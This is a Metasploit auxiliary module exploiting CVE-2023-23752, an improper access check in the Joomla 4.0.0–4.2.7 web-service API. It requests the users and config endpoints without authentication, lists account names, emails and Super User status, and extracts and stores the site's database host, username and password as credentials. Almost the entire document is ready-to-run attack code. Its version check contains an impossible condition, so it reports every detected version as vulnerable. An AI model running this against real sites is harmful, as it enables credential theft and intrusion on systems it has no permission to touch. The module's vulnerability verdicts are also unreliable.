Joomla API Improper Access Checks

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HTTP::Joomla

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Joomla API Improper Access Checks',
        'Description' => %q{
          Joomla versions between 4.0.0 and 4.2.7, inclusive, contain an improper API access vulnerability.
          This vulnerability allows unauthenticated users access to webservice endpoints which contain
          sensitive information. Specifically for this module we exploit the users and config/application
          endpoints.

          This module was tested against Joomla 4.2.7 running on Docker.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'h00die', # msf module
          'Tianji Lab', # original PoC, analysis
        ],
        'References' => [
          ['EDB', '51334'],
          ['URL', 'https://developer.joomla.org/security-centre/894-20230201-core-improper-access-check-in-webservice-endpoints.html'],
          ['URL', 'https://nsfocusglobal.com/joomla-unauthorized-access-vulnerability-cve-2023-23752-notice/'],
          ['URL', 'https://attackerkb.com/topics/18qrh3PXIX/cve-2023-23752'],
          ['CVE', '2023-23752'],
        ],
        'Targets' => [
          ['Joomla 4.0.0 - 4.2.7', {}],
        ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [],
          'SideEffects' => [IOC_IN_LOGS]
        },
        'DisclosureDate' => '2023-02-01',
        'DefaultTarget' => 0
      )
    )
    # set the default port, and a URI that a user can set if the app isn't installed to the root
    register_options(
      [
        Opt::RPORT(80),
        OptString.new('TARGETURI', [true, 'The URI of the Joomla Application', '/']),
      ]
    )
  end

  def check_host(_ip)
    unless joomla_and_online?
      return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service or not detected as Joomla")
    end

    version = joomla_version
    if version.nil?
      return Exploit::CheckCode::Safe("#{peer} - Unable to determine Joomla Version")
    end

    vprint_status("Joomla version detected: #{version}")
    ver_no = Rex::Version.new(version)
    if ver_no < Rex::Version.new('4.0.0') && ver_no >= Rex::Version.new('4.2.8')
      return Exploit::CheckCode::Safe("Joomla version #{ver_no} is NOT vulnerable")
    end

    Exploit::CheckCode::Appears("Joomla version #{ver_no} is vulnerable")
  end

  def run_host(ip)
    vprint_status('Attempting user enumeration')
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'api', 'index.php', 'v1', 'users'),
      'headers' => {
        # header is needed, it passes back JSON anyways.
        'Accept' => '*/*'
      },
      'vars_get' => {
        'public' => 'true'
      }
    )
    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
    fail_with(Failure::UnexpectedReply, "#{peer} - Page didn't load correctly (response code: #{res.code})") unless res.code == 200

    tbl = Rex::Text::Table.new(
      'Header' => 'Joomla Users',
      'Indent' => 1,
      'Columns' => ['ID', 'Super User', 'Name', 'Username', 'Email', 'Send Email', 'Register Date', 'Last Visit Date', 'Group Names']
    )

    users = res.get_json_document
    fail_with(Failure::UnexpectedReply, 'JSON document not returned') unless users # < json data wasn't properly formatted
    fail_with(Failure::UnexpectedReply, "'data' field in JSON document not found") unless users['data'] # < json data was properly formatted by the expected key wasn't present

    loot_path = store_loot('joomla.users', 'application/json', ip, res.body, 'Joomla Users')
    print_good("Users JSON saved to #{loot_path}")

    users = users['data']
    users.each do |user|
      unless user['type'] == 'users'
        next
      end

      tbl << [
        user['attributes']['id'].to_s,
        user['attributes']['group_names'].include?('Super Users') ? '*' : '',
        user['attributes']['name'].to_s,
        user['attributes']['username'].to_s,
        user['attributes']['email'].to_s,
        user['attributes']['sendEmail'].to_s,
        user['attributes']['registerDate'].to_s,
        user['attributes']['lastvisitDate'].to_s,
        user['attributes']['group_names'].to_s,
      ]
    end

    print_good(tbl.to_s)

    vprint_status('Attempting config enumeration')
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'api', 'index.php', 'v1', 'config', 'application'),
      'headers' => {
        # header is needed, it passes back JSON anyways.
        'Accept' => '*/*'
      },
      'vars_get' => {
        'public' => 'true'
      }
    )

    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
    fail_with(Failure::UnexpectedReply, "#{peer} - Page didn't load correctly (response code: #{res.code})") unless res.code == 200

    tbl = Rex::Text::Table.new(
      'Header' => 'Joomla Config',
      'Indent' => 1,
      'Columns' => ['Setting', 'Value']
    )

    config = res.get_json_document
    fail_with(Failure::UnexpectedReply, 'JSON document not returned') unless config # < json data wasn't properly formatted
    fail_with(Failure::UnexpectedReply, "'data' field in JSON document not found") unless config['data'] # < json data was properly formatted by the expected key wasn't present

    loot_path = store_loot('joomla.config', 'application/json', ip, res.body, 'Joomla Config')
    print_good("Config JSON saved to #{loot_path}")

    config = config['data']
    credential_data = {
      protocol: 'tcp',
      workspace_id: myworkspace_id,
      port: 1, # we dont get this data back so just set it to something obviously wrong instead of guessing
      origin_type: :service,
      private_type: :password,
      module_fullname: fullname,
      status: Metasploit::Model::Login::Status::UNTRIED
    }
    config.each do |setting|
      if setting['attributes'].key?('dbtype')
        credential_data[:service_name] = setting['attributes']['dbtype'].to_s
        if setting['attributes']['dbtype'].to_s == ''
          credential_data[:port] = '3306' # taking a guess since this info isn't returned but is required for create_credential_and_login
        end
        tbl << ['dbtype', setting['attributes']['dbtype'].to_s]
      elsif setting['attributes'].key?('host')
        credential_data[:address] = setting['attributes']['host'].to_s
        tbl << ['db host', setting['attributes']['host'].to_s]
      elsif setting['attributes'].key?('password')
        credential_data[:private_data] = setting['attributes']['password']
        tbl << ['db password', setting['attributes']['password'].to_s]
      elsif setting['attributes'].key?('user')
        credential_data[:username] = setting['attributes']['user'].to_s
        tbl << ['db user', setting['attributes']['user'].to_s]
      elsif setting['attributes'].key?('db')
        tbl << ['db name', setting['attributes']['db'].to_s]
      elsif setting['attributes'].key?('dbprefix')
        tbl << ['db prefix', setting['attributes']['dbprefix'].to_s]
      elsif setting['attributes'].key?('dbencryption')
        tbl << ['db encryption', setting['attributes']['dbencryption'].to_s]
      end
    end
    # if db host isn't a FQDN or IP, this will silently fail to save.
    create_credential_and_login(credential_data)

    print_good(tbl.to_s)
  end
end